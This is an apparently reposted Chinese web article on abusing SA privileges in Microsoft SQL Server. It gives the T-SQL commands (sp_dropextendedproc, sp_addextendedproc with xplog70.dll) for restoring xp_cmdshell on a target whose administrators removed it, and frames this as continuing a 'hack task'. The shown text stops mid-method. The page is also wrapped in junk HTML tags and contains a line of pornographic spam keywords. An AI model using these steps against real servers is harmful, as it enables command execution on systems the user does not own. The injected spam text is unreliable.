• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • Microsoft SQL Server數據庫SA權限總結

    發表于:2008-06-16來源:作者:點擊數: 標簽:數據庫SQLsqlSqlSERVER
    需要準備的工具: SQL Query Analyzer和SqlExec Sunx Version 第一部分: 去掉xp_cmdshell保護系統的具體分析: 語句如下: 1.去掉xp_cmdshell擴展過程的方法是使用如下語句: if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshe
    需要準備的工具:

      SQL Query Analyzer和SqlExec Sunx Version

      第一部分:

      去掉xp_cmdshell保護系統的具體分析:

      語句如下:

      1.去掉xp_cmdshell擴展過程的方法是使用如下語句:

      if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

      2.添加xp_cmdshell擴展過程的方法是使用如下語句:

      sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

      現在看看現象:

      我們在取得SA權限后遠程用Sqlexec執行cmd命令,出現提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。

      現在來看看被去掉xp_cmdshell后恢復的兩種方法:

      方法一、使用SQL Query Analyzer連接對方后直接寫入,挺方便sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

      方法二、使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format選項里填上%s,在CMD選項里輸入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'或者對Sql2000情況下使用sp_addextendedproc 'xp_cmdshell','xplog70.dll'另外使用SqlExec Sunx Version來去除xp_cmdshell的方法和加的時候選擇條件一樣,然后輸入sp_dropextendedproc 'xp_cmdshell'就可以了。

      第二部分:

      假如對方已經把xplog70.dll刪除或者改了名,我們來用下面的方法繼續我們的hack任務:

      當出現如下現象暗示代表很有可能是xplog70.dll刪除或者改了名。

      在查詢分析器中寫入sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'提示數據庫中已存在名為'xp_cmdshell'的對象。

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>